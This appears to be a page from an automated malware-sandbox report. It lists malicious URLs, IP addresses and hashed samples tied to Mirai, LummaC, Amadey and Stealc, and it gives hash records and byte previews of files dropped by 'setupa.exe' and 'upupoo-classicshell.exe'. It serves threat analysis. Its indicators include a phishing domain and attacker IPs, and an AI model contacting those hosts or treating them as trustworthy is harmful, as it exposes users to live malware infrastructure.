https://login-wsapp.shop/ | malicious | Unknown | 47.76.213.192
SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elf | malicious | Mirai | 47.78.236.62

Match: CHARTER-20115US
Associated Sample Name / URL | Detection | Threat Name | Context
Jr77pnmOup.elf | malicious | Mirai | 71.94.21.162
ZEjcJZcrXc.elf | malicious | Mirai |
                                                                                                            • 24.178.88.151
                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 47.26.86.21
                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 66.169.57.64
                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 47.6.21.109
                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 71.81.11.13
                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 68.189.209.139
                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 47.5.199.142
                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 71.14.195.176
                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 75.140.122.103
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                                                                            • 47.79.64.157
                                                                                                            TVyKPaL2h0.exeGet hashmaliciousAmadeyBrowse
                                                                                                            • 47.79.64.157
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            8ObkdHP9Hq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                                                                            • 47.79.64.157
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            MSCy5UvBYg.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                            • 47.79.64.157
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 47.79.64.157
                                                                                                            No context
                                                                                                            Process:C:\Users\user\Desktop\setupa.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):243712
                                                                                                            Entropy (8bit):6.85528085491608
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:zKZ/ikgjBxcTw7lIdrnS5355bC6vkuphSFd/hwlJQHmD3aQSYbx7ieLrMvBhQ2xD:k/ikgjYTKH35UkphwJPEKKiKrMJhQ
                                                                                                            MD5:D48560E3661D0EAE2E67CB13044710C3
                                                                                                            SHA1:2D2C3AD41FA699C00FD10285448BC1E0E70D9E63
                                                                                                            SHA-256:F3378B866C81A82E16807EAD2126E59ECEC07F08F9750BC03F13B68B7519A966
                                                                                                            SHA-512:9B8B6ADBF5C1F75BA13B677B29CEE71D6A826985D77E91956104D262703583A3AE2FE6E835917F9EDBBB8EFE9D61F6B902A23D523C8333CA720B7C7138B69F13
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........>.g._b4._b4._b4r.4._b4r.4._b4r.4._b4...4._b4._c4G_b4X..4._b4#.a5._b4#.g5._b4#.f5._b4._b4._b44.a5._b44.f5._b44.g5._b44.b5._b44..4._b44.`5._b4Rich._b4................PE..L......f...........!......................................................................@..........................B..E....F..P...............................$4...0..8...................41.......0..@...............X............................text...)........................... ..`.rdata..j...........................@..@.data...pP...P...>...>..............@....tls.................|..............@....rsrc................~..............@..@.reloc..$4.......6..................@..B........................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\setupa.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):89088
                                                                                                            Entropy (8bit):7.997839675244527
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:Y6YS7k7T3meXF/L84dzPu3beQ09aTQVRpVADU9mMy0H7lsH9:PY4k+ei41Pw4a8VRphmVilsd
                                                                                                            MD5:0528A5A3C232862A4B0D9624B6F23D0C
                                                                                                            SHA1:45ADAD971A0DB2EA9F26A69C881557995B49A5B6
                                                                                                            SHA-256:C42036589B0B746F4A72BD0C900FB07F1C9032AA4842CD4AFC6CFC6ABBA4FB9B
                                                                                                            SHA-512:C084E7657C3498B776845E5B7BE32A976849A963B6C74CE62A7F35DF7E77DF80603881546DCB468D512464CDF71A800CF449BCFA18585B5F87E314007447649E
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:.K.uU"...x....d.M.7.|.i_c^^.K]YM(}./........1.{QM<.x.....[.x...5..hiz.k..)p.2..q.=..?s;..'.,f.x.N..h..}....K.I....8.Q9.9X.3.zdj...G.m..B.{.._k@Z.n..dxS.Et......Iea........H.Rm/.5.....R_....GS.2.,.F.N. .....&-..".B.Z..E.G...T.\..........:.m.<f.$............\........nS.{5..Y...-.'C.pN..k..==....Nn4.@.........W...rU..b..o/...6.@ ..@$t....M#&.+5..E.....&.d..<(.....@*......}....1.K......._..-.RGj..K.+....=...N... zLa..o.3.6...ZG.....`A.}.,.lrbA..D#>.%...n.2...A..;.j..F..B\.E...0.......8.........o..,..9X.R....$.G.....S r.-..?..e.`+ZI.@D.e.3p..n..!...Y.,.-?v.c......a.I..|@..6).$9N..(.f..jEFM..A.......Z.B....L1O..K..I..X....7..Q....$%/..o....t.vN....j....21...6.2L...>....9...0..@...Ns......(.N...o(..:.......,..t....o./Z..q.d."..{..XI..~...U.(.'.f.../W....h.....E.G.X-.(:HyL.J./e.n....!d..z...Y..1...k.{Ph..>../.y..2"...):5......b.I2.o.H,q."s.+.+...{wf_.B...2..y....G.Lg.U.5.j....Hm....\.).,H.F..OQ..D0.....L..(8..O.[.'.)....(..eaX<.]...w..E.4.....
                                                                                                            Process:C:\Users\user\Desktop\setupa.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):198920
                                                                                                            Entropy (8bit):6.459024129905556
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:3ADL8CQJ+ZhpTjqENRRRRRRRRRRRRRRRRRRRRRRRRRRRRKYRRRRRRRRRRRRRRRR6:3ADoC0+Z3VNRRRRRRRRRRRRRRRRRRRRg
                                                                                                            MD5:606CDA46E88CE86AE85AC92B2B560D0A
                                                                                                            SHA1:0BBBEB360175BD6033E8DBB0E1571D4595ED38DD
                                                                                                            SHA-256:99AC89D65B0CFC28D64652717EDF4B66E5DDE4741379EEB2F4F9A187801EA50E
                                                                                                            SHA-512:CBF457D793757676A7C1D5B364AE194D4B8433D9F36E82496B8EE8A92B1498A16A1E25BDB3C86DE6692F2B9E397E5B59ABA0DAA5E2EB90371E20C4D751B5037C
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Reputation:low
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................g...........<.....................Rich...........................PE..L...`..b.............................X.......0....@.................................P(....@.................................$h...........................A...........3...............................Z..@............0...............................text............................... ..`.rdata...H...0...J... ..............@..@.data...8=....... ...j..............@....rsrc...............................@..@.reloc...#.......$..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.7822294246293886
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:i5FEw+sqhtoI7Rh6tQXIDcQvc6QcEVcw3cE/n+HbHgnoW6HeonsFERSAEj6TpOyz:Kiw+D0BU/gj4zzuiFJZ24IO8mk
                                                                                                            MD5:A4E8A6C9F4AEDD68E1E1826D070BD545
                                                                                                            SHA1:A21837DE5B883CC780677FF7F6790D355FDF3B0B
                                                                                                            SHA-256:6FDFF9E31992F0B6E6DED98517329CBC54EC01317CB8F8B257048D0EF7E6590F
                                                                                                            SHA-512:165119186CC1801524DDAFC25E22F499A0EE9479FC677C4560EFF6AE720A79F85DDE352A6AED199687B3A28D24FA9387F13605AAD653F26BAC997DF60B82947F
                                                                                                            Malicious:false
                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.4.9.5.5.0.1.2.1.8.5.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.4.9.5.5.1.3.0.9.3.5.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.c.5.3.4.5.0.a.-.f.c.b.1.-.4.1.4.d.-.a.2.8.9.-.a.7.a.4.0.7.3.8.6.6.1.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.4.d.d.d.b.c.e.-.5.7.1.5.-.4.6.0.2.-.8.6.6.e.-.1.6.0.b.1.3.9.1.2.c.0.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.p.u.p.o.o.-.c.l.a.s.s.i.c.s.h.e.l.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.4.0.-.0.0.0.1.-.0.0.1.4.-.e.b.b.1.-.c.6.d.8.7.2.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.u.p.u.p.o.o.-.c.l.a.s.s.i.c.s.h.e.l.l...e.
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.7917649946837094
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:RvvFque6CwTZsqHtoI7Rh6tQXIDcQvc6QcEVcw3cE/R5P+HbHgnoW6HeonsFERSI:R3ZzCwTZF0BU/gj2/zuiFJZ24IO89
                                                                                                            MD5:EC44398075ACDBEA686603328EA25F09
                                                                                                            SHA1:35E8B4AFC88887C37832A19154BB2E9FC7EB0DDE
                                                                                                            SHA-256:772650D4DE093F8393FA0054CC5D75BAEB8B436FDDB3C294120B30279F187660
                                                                                                            SHA-512:03CC0ED63F3D9DECD62A18A90F0E4B91677506D9C356374B972753E81562244990D4199000F60B4824ED1D1D3FD9118667E46CB2238F51935ACD4681C139B516
                                                                                                            Malicious:false
                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.7.4.9.5.5.9.1.5.6.7.1.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.7.4.9.5.5.9.6.5.6.7.1.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.6.b.4.d.f.3.-.f.7.6.4.-.4.5.f.8.-.a.a.6.f.-.1.9.5.f.e.c.1.8.3.d.a.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.9.b.b.0.c.a.-.c.a.7.3.-.4.a.8.4.-.9.7.d.c.-.b.6.4.e.6.7.e.3.0.b.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.p.u.p.o.o.-.c.l.a.s.s.i.c.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.u.p.u.p.o.o.-.c.l.a.s.s.i.c.s.h.e.l.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.1.c.-.0.0.0.1.-.0.0.1.4.-.e.9.d.4.-.2.1.d.e.7.2.1.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.5.8.f.e.4.6.1.e.1.0.c.a.9.0.6.f.5.6.8.4.e.8.d.7.7.4.9.6.5.9.6.0.0.0.0.0.9.0.4.!.0.0.0.0.0.b.b.b.e.b.3.6.0.1.7.5.b.d.6.0.3.3.e.8.
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Oct 7 04:39:10 2024, 0x1205a4 type
                                                                                                            Category:dropped
                                                                                                            Size (bytes):45942
                                                                                                            Entropy (8bit):1.997276000752008
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:pqdVLgJuKoKmSOwdmJXpKrWEjrkJV7s768g/ZZLt1lodxkmBbXk9VyewLO:yV8UKoKmtumJukJByghodxkmBzc8i
                                                                                                            MD5:537A507DC2C85235300BC7DCDAA32B8A
                                                                                                            SHA1:9266E2B512EC1912BFB7001A15A51DF8282A1F0B
                                                                                                            SHA-256:AD5AA50D2113B767861CFC47E282D747FF6B3859E205609062E97A2F875625DA
                                                                                                            SHA-512:60DB2E096E6A285684223AB297F8B6A82DDA95567615E3A32D7FEB6F4E39E42ABE408B4ECC705F1C10AD070E4D8E59BCA4E861F8B0042F64348D7A79D4BA8319
                                                                                                            Malicious:false
                                                                                                            Preview:MDMP..a..... ........e.g........................$...............p"..........T.......8...........T........... ...V.......................................................................................................eJ......D.......GenuineIntel............T.......@....e.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8440
                                                                                                            Entropy (8bit):3.698999821184585
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:R6l7wVeJ6Z6S6Y5vVQ3SU65Igmf3OSprh89b+5sfyKm:R6lXJk6S6Y83SULgmf3u+Sf2
                                                                                                            MD5:89481675AA2281C58ED9361E93457D7D
                                                                                                            SHA1:CBC7CFEF445A5B88CD4F0D41CB254385C61CDBE0
                                                                                                            SHA-256:7F3B5E701FAC7E74E5602FB3D5D66328398A8FD9FE537DD579D663933CDEA065
                                                                                                            SHA-512:293581B0E60E1DF518747218AC58D30FF94725825DC909A3E218977D524C1C69D4D8FAC3688ACCDF187D0E53C8F3FFEE3F84CD65FD5C7228186440B1BF80D1B6
                                                                                                            Malicious:false
                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.9.6.<./.P.i.
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4769
                                                                                                            Entropy (8bit):4.484706858911588
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwWl8zs0Jg77aI97AWpW8VYoYm8M4J6t7JFv+q8vat7vaKcQIcQGgXRd:uIjfyI7157VMJ6xKaRaKkGCRd
                                                                                                            MD5:01B1F3D1833110BBA8FC671E203421BF
                                                                                                            SHA1:2C70E151784405C0CD13FCD9AC6B73A7FBE756DB
                                                                                                            SHA-256:C9DE0AF44119524729EA85FF6DB4EC579A41F79FEA7D81D66303C1223BBB070C
                                                                                                            SHA-512:F6F51A360E9B311E5A0D0A542FF71B7C05FE5EACF3792301836CC45C7CFD17B40B9DEA582D2855A3A488F33D1C2EE0A30867E3AC8C806DC8A79AA69B5D4D7811
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="532541" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Mini DuMP crash report, 14 streams, Mon Oct 7 04:39:19 2024, 0x1205a4 type
                                                                                                            Category:dropped
                                                                                                            Size (bytes):45210
                                                                                                            Entropy (8bit):2.033874872490031
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:YvwLghuSOwdmcsXsmSVLSTPWu1S+3If3bHgPOyOMj6:+w8mupsPSVLkEie3bHgPx
                                                                                                            MD5:263FAE3D174B883793924C6C17C1E366
                                                                                                            SHA1:32BEAAEB7183D2989960C573919A68C54F01EFF1
                                                                                                            SHA-256:21E27735AB89DB3A15C77730DE1E56894CFD0A0F3C372A80D3DCA329FF1018B7
                                                                                                            SHA-512:DF6CFD6995AC17029FC9BFF681B37864C6083FF33CAD21BD97C292C007AED3BC674843A6B451766077E50CFC4EC9C13399D4E391DACF05196B801CE4CB8F1506
                                                                                                            Malicious:false
                                                                                                            Preview:MDMP..a..... ........e.g........................$...............p"..........T.......8...........T.......................................................................................................................eJ......D.......GenuineIntel............T............e.g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8460
                                                                                                            Entropy (8bit):3.699053239742441
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:R6l7wVeJk6626YEI5SU90orgmfROSprY89bGksfrim:R6lXJ5626YEGSU90orgmfRlGXfP
                                                                                                            MD5:F72E321A4248A048274D5CFA4FB82C87
                                                                                                            SHA1:6FCCE2E4A9AB1BF313B1BD2FDFFAA0D0ABB730BC
                                                                                                            SHA-256:ACA4D0CFECA16FEE482715A4D73D38486543A00FE7FE4D55356AAED56D7DDAF2
                                                                                                            SHA-512:FFCA926308C1F5BBC5380B3D35F3A26E6D7B1CAFA812D54DA2236BE02C56E51DDCFCD3E773BBF04F397E60FAB08BE2C98899E64B71E65B560AA51DBF744D79F2
                                                                                                            Malicious:false
                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.0.8.<./.P.i.
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4843
                                                                                                            Entropy (8bit):4.496322480174013
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwWl8zs2iJg77aI97AWpW8VYg5Ym8M4JQt7JF5+q8vwt7fBtKiYogXUd:uIjffI7157VoJQnKwRBTfCUd
                                                                                                            MD5:CDECBAAE0708FF5B557D33B07A6DA857
                                                                                                            SHA1:24B76DA17E7181A93F6D16C65731E78CF2C4A330
                                                                                                            SHA-256:579CB10FC6C5EB42C0DF9EEA87E21D5D5A47A2A35FF96F6E6229E115461DA01D
                                                                                                            SHA-512:9A38FBF07EDF81B47EC86A2E1E217136EB02948D28A188F7AB8141DCE509B0A5B9B9C6FF68AEA1757B7731CC0FBA20311327E1E88723A2BB008E84DBA4CFCB51
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="532542" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                            Process:C:\Program Files\upupoo-classicshell.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):243712
                                                                                                            Entropy (8bit):6.85528085491608
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:zKZ/ikgjBxcTw7lIdrnS5355bC6vkuphSFd/hwlJQHmD3aQSYbx7ieLrMvBhQ2xD:k/ikgjYTKH35UkphwJPEKKiKrMJhQ
                                                                                                            MD5:D48560E3661D0EAE2E67CB13044710C3
                                                                                                            SHA1:2D2C3AD41FA699C00FD10285448BC1E0E70D9E63
                                                                                                            SHA-256:F3378B866C81A82E16807EAD2126E59ECEC07F08F9750BC03F13B68B7519A966
                                                                                                            SHA-512:9B8B6ADBF5C1F75BA13B677B29CEE71D6A826985D77E91956104D262703583A3AE2FE6E835917F9EDBBB8EFE9D61F6B902A23D523C8333CA720B7C7138B69F13
                                                                                                            Malicious:false
                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........>.g._b4._b4._b4r.4._b4r.4._b4r.4._b4...4._b4._c4G_b4X..4._b4#.a5._b4#.g5._b4#.f5._b4._b4._b44.a5._b44.f5._b44.g5._b44.b5._b44..4._b44.`5._b4Rich._b4................PE..L......f...........!......................................................................@..........................B..E....F..P...............................$4...0..8...................41.......0..@...............X............................text...)........................... ..`.rdata..j...........................@..@.data...pP...P...>...>..............@....tls.................|..............@....rsrc................~..............@..@.reloc..$4.......6..................@..B........................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files\upupoo-classicshell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):89088
                                                                                                            Entropy (8bit):7.997839675244527
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:Y6YS7k7T3meXF/L84dzPu3beQ09aTQVRpVADU9mMy0H7lsH9:PY4k+ei41Pw4a8VRphmVilsd
                                                                                                            MD5:0528A5A3C232862A4B0D9624B6F23D0C
                                                                                                            SHA1:45ADAD971A0DB2EA9F26A69C881557995B49A5B6
                                                                                                            SHA-256:C42036589B0B746F4A72BD0C900FB07F1C9032AA4842CD4AFC6CFC6ABBA4FB9B
                                                                                                            SHA-512:C084E7657C3498B776845E5B7BE32A976849A963B6C74CE62A7F35DF7E77DF80603881546DCB468D512464CDF71A800CF449BCFA18585B5F87E314007447649E
                                                                                                            Malicious:false
                                                                                                            Preview:.K.uU"...x....d.M.7.|.i_c^^.K]YM(}./........1.{QM<.x.....[.x...5..hiz.k..)p.2..q.=..?s;..'.,f.x.N..h..}....K.I....8.Q9.9X.3.zdj...G.m..B.{.._k@Z.n..dxS.Et......Iea........H.Rm/.5.....R_....GS.2.,.F.N. .....&-..".B.Z..E.G...T.\..........:.m.<f.$............\........nS.{5..Y...-.'C.pN..k..==....Nn4.@.........W...rU..b..o/...6.@ ..@$t....M#&.+5..E.....&.d..<(.....@*......}....1.K......._..-.RGj..K.+....=...N... zLa..o.3.6...ZG.....`A.}.,.lrbA..D#>.%...n.2...A..;.j..F..B\.E...0.......8.........o..,..9X.R....$.G.....S r.-..?..e.`+ZI.@D.e.3p..n..!...Y.,.-?v.c......a.I..|@..6).$9N..(.f..jEFM..A.......Z.B....L1O..K..I..X....7..Q....$%/..o....t.vN....j....21...6.2L...>....9...0..@...Ns......(.N...o(..:.......,..t....o./Z..q.d."..{..XI..~...U.(.'.f.../W....h.....E.G.X-.(:HyL.J./e.n....!d..z...Y..1...k.{Ph..>../.y..2"...):5......b.I2.o.H,q."s.+.+...{wf_.B...2..y....G.Lg.U.5.j....Hm....\.).,H.F..OQ..D0.....L..(8..O.[.'.)....(..eaX<.]...w..E.4.....
                                                                                                            Process:C:\Program Files\upupoo-classicshell.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):198920
                                                                                                            Entropy (8bit):6.459024129905556
                                                                                                            Encrypted:false
